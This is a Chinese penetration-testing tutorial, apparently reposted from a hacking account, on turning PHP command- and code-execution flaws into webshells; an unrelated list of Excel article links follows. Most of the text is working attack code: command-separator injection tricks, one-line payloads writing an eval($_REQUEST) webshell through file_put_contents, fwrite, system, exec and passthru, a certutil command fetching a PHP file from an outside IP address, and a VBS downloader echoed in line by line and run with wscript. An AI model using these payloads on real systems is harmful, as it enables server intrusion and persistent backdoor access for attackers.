通过代码执行或命令执行写Shell_命令执行和代码执行
moboyou 2025-08-19 19:47 8 浏览
公众号:白帽子左一
专注分享渗透经验,干货技巧...
本文由团队手电筒分享,如果你还是个小白担心看不懂,没关系,“三步写马””如何上传木马”“如何拿下服务器并妥善管理”等实战内容可以结合视频观看,视频演示先从原理,再到实操演示,一步步清晰明了,更易吸收,视频私信我
PHP
一.命令执行
命令执行(注入)常见可控位置情况有下面几种:
system("$arg"); //可控点直接是待执行的程序
如果我们能直接控制$arg,那么就能执行执行任意命令了。
system("/bin/prog $arg"); //可控点是传入程序的整个参数
我们能够控制的点是程序的整个参数,我们可以直接用&& || 或 | 等等,利用与、或、管道命令来执行其他命令(可以涉及到很多linux命令行技巧)。
system("/bin/prog -p $arg"); //可控点是传入程序的某个参数的值(无引号包裹)
我们控制的点是一个参数,我们也同样可以利用与、或、管道来执行其他命令,情境与二无异。
system("/bin/prog -p=\"$arg\"");//可控点是传入程序的某个参数的值(有双引号包裹)
这种情况压力大一点,有双引号包裹。
如果引号没有被转义,我们可以先闭合引号,成为第三种情况后按照第三种情况来利用,如果引号被转义(addslashes)、我们也不必着急。
linux shell 环境下双引号中间的变量也是可以被解析的,我们可以在双引号内利用反引号执行任意命令 id
system("/bin/prog --p='$arg'"); //可控点是传入程序的某个参数的值(有单引号包裹)
这是最困难的一种情况
因为单引号内只是一个字符串,我们要先闭合单引号才可以执行命令。
如:system(“/bin/prog –p=’aaa’ | id”)
在漏洞检测中,除了有回显的命令
还可以使用盲打的方式,比如curl远程机器的某个目录(看access.log),或者通过dns解析的方式获取到漏洞机器发出的请求。
当我们确定了OS命令注入漏洞后,通常可以执行一些初始命令来获取有关受到破坏的系统的信息。
以下是在Linux和Windows平台上常用的一些命令的摘要:
命令目的 | linux | windows |
当前用户名 | whoami | whoami |
操作系统 | uname -a | ver |
网络配置 | ifconfig | ipconfig /all |
网络连接 | netstat -an | netstat -an |
运行进程 | ps -ef | tasklist |
命令分隔符
在Linux上, ; 可以用 |、|| 代替
;前面的执行完执行后面的
|是管道符,显示后面的执行结果
||当前面的执行出错时执行后面的
可用**%0A和 \n**换行执行命令在Windows上,不能用 ; 可以用&、&&、|、||代替
&前面的语句为假则直接执行后面的
&&前面的语句为假则直接出错,后面的也不执行
|直接执行后面的语句
||前面出错执行后面的PHP 支持一个执行运算符:反引号(``) PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回
<?php echo `whoami`;?>效果与函数 shell_exec() 相同,都是以字符串的形式返回一个命令的执行结果,可以保存到变量中
二.代码执行
此处以php为例,其它语言也存在这类利用。
(1) preg_replace()函数:
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [,int $limit =-1[,int&$count ]])当$pattern处存在e修饰符时,$replacement 会被当做php代码执行。
(2)mixed call_user_func( callable $callbank [ , mixed $parameter [ , mixed
$…):
第一个参数为回调函数,第二个参数是回调函数的参数
(3)eval()和assert():
当assert()的参数为字符串时 可执行PHP代码
【区分】:
eval(" phpinfo(); ");【√】eval(" phpinfo() ");【X】
assert(" phpinfo(); ");【√】assert(" phpinfo() ");【√】三.反序列化
php反序列化导致RCE的原理及利用,参考专题文章:
四.通过代码执行或命令执行写shell
代码执行写shell
当遇到一个可以代码执行的位置时,我们可以通过写webshell来进行进一步渗透
1.file_put_contents函数
file_put_contents函数格式为file_put_contents(filename,data)
指定写入文件名和写入文件的数据
可以通过这个函数去写入数据
这里用了网上的漏洞测试的平台
测试语句为:
file_put_contents('gt.php','<?php eval($_REQUEST[5]);?>');访问文件
2.fopen() 创建文件函数
fopen函数,格式为fopen(filename,mode) 前面是文件名,后面是规定要求到该文件/流的访问类型
它的作用是打开文件或url,这里当后续命令为w,或W+ 时,当文件不存在的话就会新建一个文件
然后再用fwrite去写入数据
fwrite()写入文件函数,格式为fwrite(file,string),这里file是文件名,string是写入的字符串
这里注意如果是通过assert函数去代码执行,那么只允许一条语句去执行
这里可以把两个命令写一起
例如
fwrite(fopen('z23.php','a'),'<?php phpinfo(); ?>');执行效果如下
执行语句
fwrite(fopen('z23.php','a'),'<?php phpinfo(); ?>');访问文件
3.fputs函数
Fputs函数也是php里一个用于写入文件的函数,它其实是fwrite的别名
基本用法和fwrite一样
测试语句为
fputs(fopen('tk.php','w'),'<?php phpinfo();?>');执行语句
fputs(fopen('tk.php','w'),'<?php phpinfo();?>');访问文件
4.通过执行命令执行函数去写shell
通过代码执行漏洞去执行代码脚本调用操作系统命令
常用函数有
system()
exec()
shell_exec()
passthru()
pcntl_exec()
popen()
proc_open()
这里我们只挑选其中部分来测试,其他的道理差不多
4.1、首先为system()
测试语句为
system(' echo "<?php @eval($_REQUEST[8])?>" >pp.php ');然后访问文件测试下
测试完成
4.2、exec()函数
测试语句如下
exec(' echo "<?php @eval($_REQUEST[8])?>" >ppl.php ');在本地执行下
访问生成文件
4.3、shell_exec()函数
测试语句为
shell_exec(' echo "<?php @eval($_REQUEST[8])?>" >ppk.php ');在本地执行测试
访问生成文件
4.4、passthru()函数
测试语句为
passthru(' echo "<?php @eval($_REQUEST[8])?>" >ppm.php ');在本地测试
访问生成文件
命令执行写webshell
通过cmd命令去写入
通过cmd里的echo去写入webshell
命令如下
echo "<?php @eval($_REQUEST[8])?>">223.php执行如下
返回页面如下
访问223.php
通过命令执行去远程下载shell
利用windows的certutil命令
例:
certutil -urlcache -split -f http://129.211.169.121/123.php通过windows的certutil去在外部下载文件
这个certutil是windows系统上预装的工具,一般用于校验md5,sha1,sha256,下载文件
执行这个需要相当高的权限,
在搭建的服务器上安装好环境
在本地测试一下
执行命令
certutil -urlcache -split -f http://129.211.169.121/123.php得到结果
得到返回文件
访问效果如下
通过vbs去建立脚本去下载
vbs是基于visual Basic的脚本语言,一般windows设备自带
这里我们通过命令执行去写入脚本,然后再通过命令执行去下载shell
测试脚本如下
Set args =Wscript.Arguments
Url="http://129.211.169.121/1234.php"
dim xHttp:Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm:Set bStrm = createobject("Adodb.Stream")
xHttp.Open"GET",Url,False
xHttp.Send
with bStrm
.type =1
.open
.write xHttp.responseBody
.savetofile "12345.php",2
endwith先再远程机器上设立一个php文件名为1234.php
内容为
<?php
echo “<?php phpinfo();?>”;
?>为什么要这样写呢?
这个脚本是直接读取远程机器上的文件信息然后写入到一个文件里,我们通过读取这个php页面显示的语句去获得shell内容
然后我们在页面里去写入vbs文件,这里脚本内容过长,且有换行,我们通过echo 一条条写入命令,和前面命令执行写shell一样
echo Set args =Wscript.Arguments> xxx.vbs
echo Url="http://129.211.169.121/1234.php">>xxx.vbs
echo dim xHttp:Set xHttp = createobject("Microsoft.XMLHTTP")>>xxx.vbs
echo dim bStrm:Set bStrm = createobject("Adodb.Stream")>>xxx.vbs
echo xHttp.Open"GET",Url,False>>xxx.vbs
echo xHttp.Send>>xxx.vbs
echo with bStrm >>xxx.vbs
echo .type =1>>xxx.vbs
echo .open >>xxx.vbs
echo .write xHttp.responseBody >>xxx.vbs
echo .savetofile "12345.php",2>>xxx.vbs
echo endwith>>xxx.vbs后续内容通过>> 换行写入
得到xxx.vbs文件
然后在存在命令执行处执行命令去下载文件
执行命令 start wscript -e:vbs xxx.vbs
然后得到文件
去访问
未完待续...
相关推荐
- Excel技巧:SHEETSNA函数一键提取所有工作表名称批量生产目录
-
首先介绍一下此函数:SHEETSNAME函数用于获取工作表的名称,有三个可选参数。语法:=SHEETSNAME([参照区域],[结果方向],[工作表范围])(参照区域,可选。给出参照,只返回参照单元格...
- Excel HOUR函数:“小时”提取器_excel+hour函数提取器怎么用
-
一、函数概述HOUR函数是Excel中用于提取时间值小时部分的日期时间函数,返回0(12:00AM)到23(11:00PM)之间的整数。该函数在时间数据分析、考勤统计、日程安排等场景中应用广泛。语...
- Filter+Search信息管理不再难|多条件|模糊查找|Excel函数应用
-
原创版权所有介绍一个信息管理系统,要求可以实现:多条件、模糊查找,手动输入的内容能去空格。先看效果,如下图动画演示这样的一个效果要怎样实现呢?本文所用函数有Filter和Search。先用filter...
- FILTER函数介绍及经典用法12:FILTER+切片器的应用
-
EXCEL函数技巧:FILTER经典用法12。FILTER+切片器制作筛选按钮。FILTER的函数的经典用法12是用FILTER的函数和切片器制作一个筛选按钮。像左边的原始数据,右边想要制作一...
- office办公应用网站推荐_office办公软件大全
-
以下是针对Office办公应用(Word/Excel/PPT等)的免费学习网站推荐,涵盖官方教程、综合平台及垂直领域资源,适合不同学习需求:一、官方权威资源1.微软Office官方培训...
- WPS/Excel职场办公最常用的60个函数大全(含卡片),效率翻倍!
-
办公最常用的60个函数大全:从入门到精通,效率翻倍!在职场中,WPS/Excel几乎是每个人都离不开的工具,而函数则是其灵魂。掌握常用的函数,不仅能大幅提升工作效率,还能让你在数据处理、报表分析、自动...
- 收藏|查找神器Xlookup全集|一篇就够|Excel函数|图解教程
-
原创版权所有全程图解,方便阅读,内容比较多,请先收藏!Xlookup是Vlookup的升级函数,解决了Vlookup的所有缺点,可以完全取代Vlookup,学完本文后你将可以应对所有的查找难题,内容...
- 批量查询快递总耗时?用Excel这个公式,自动计算揽收到签收天数
-
批量查询快递总耗时?用Excel这个公式,自动计算揽收到签收天数在电商运营、物流对账等工作中,经常需要统计快递“揽收到签收”的耗时——比如判断某快递公司是否符合“3天内送达”的服务承...
- Excel函数公式教程(490个实例详解)
-
Excel函数公式教程(490个实例详解)管理层的财务人员为什么那么厉害?就是因为他们精通excel技能!财务人员在日常工作中,经常会用到Excel财务函数公式,比如财务报表分析、工资核算、库存管理等...
- Excel(WPS表格)Tocol函数应用技巧案例解读,建议收藏备用!
-
工作中,经常需要从多个单元格区域中提取唯一值,如体育赛事报名信息中提取唯一的参赛者信息等,此时如果复制粘贴然后去重,效率就会很低。如果能合理利用Tocol函数,将会极大地提高工作效率。一、功能及语法结...
- Excel中的SCAN函数公式,把计算过程理清,你就会了
-
Excel新版本里面,除了出现非常好用的xlookup,Filter公式之外,还更新一批自定义函数,可以像写代码一样写公式其中SCAN函数公式,也非常强大,它是一个循环函数,今天来了解这个函数公式的计...
- Excel(WPS表格)中多列去重就用Tocol+Unique组合函数,简单高效
-
在数据的分析和处理中,“去重”一直是绕不开的话题,如果单列去重,可以使用Unique函数完成,如果多列去重,如下图:从数据信息中可以看到,每位参赛者参加了多项运动,如果想知道去重后的参赛者有多少人,该...
- Excel(WPS表格)函数Groupby,聚合统计,快速提高效率!
-
在前期的内容中,我们讲了很多的统计函数,如Sum系列、Average系列、Count系列、Rank系列等等……但如果用一个函数实现类似数据透视表的功能,就必须用Groupby函数,按指定字段进行聚合汇...
- Excel新版本,IFS函数公式,太强大了!
-
我们举一个工作实例,现在需要计算业务员的奖励数据,右边是公司的奖励标准:在新版本的函数公式出来之前,我们需要使用IF函数公式来解决1、IF函数公式IF函数公式由三个参数组成,IF(判断条件,对的时候返...
- Excel不用函数公式数据透视表,1秒完成多列项目汇总统计
-
如何将这里的多组数据进行汇总统计?每组数据当中一列是不同菜品,另一列就是该菜品的销售数量。如何进行汇总统计得到所有的菜品销售数量的求和、技术、平均、最大、最小值等数据?不用函数公式和数据透视表,一秒就...
- 一周热门
- 最近发表
-
- Excel技巧:SHEETSNA函数一键提取所有工作表名称批量生产目录
- Excel HOUR函数:“小时”提取器_excel+hour函数提取器怎么用
- Filter+Search信息管理不再难|多条件|模糊查找|Excel函数应用
- FILTER函数介绍及经典用法12:FILTER+切片器的应用
- office办公应用网站推荐_office办公软件大全
- WPS/Excel职场办公最常用的60个函数大全(含卡片),效率翻倍!
- 收藏|查找神器Xlookup全集|一篇就够|Excel函数|图解教程
- 批量查询快递总耗时?用Excel这个公式,自动计算揽收到签收天数
- Excel函数公式教程(490个实例详解)
- Excel(WPS表格)Tocol函数应用技巧案例解读,建议收藏备用!
- 标签列表
-
- 外键约束 oracle (36)
- oracle的row number (32)
- 唯一索引 oracle (34)
- oracle in 表变量 (28)
- oracle导出dmp导出 (28)
- 多线程的创建方式 (29)
- 多线程 python (30)
- java多线程并发处理 (32)
- 宏程序代码一览表 (35)
- c++需要学多久 (25)
- css class选择器用法 (25)
- css样式引入 (30)
- css教程文字移动 (33)
- php简单源码 (36)
- php个人中心源码 (25)
- php小说爬取源码 (23)
- 云电脑app源码 (22)
- html画折线图 (24)
- docker好玩的应用 (28)
- linux有没有pe工具 (34)
- 可以上传视频的网站源码 (25)
- 随机函数如何生成小数点数字 (31)
- 随机函数excel公式总和不变30个数据随机 (33)
- 所有excel函数公式大全讲解 (22)
- 有动图演示excel函数公式大全讲解 (32)
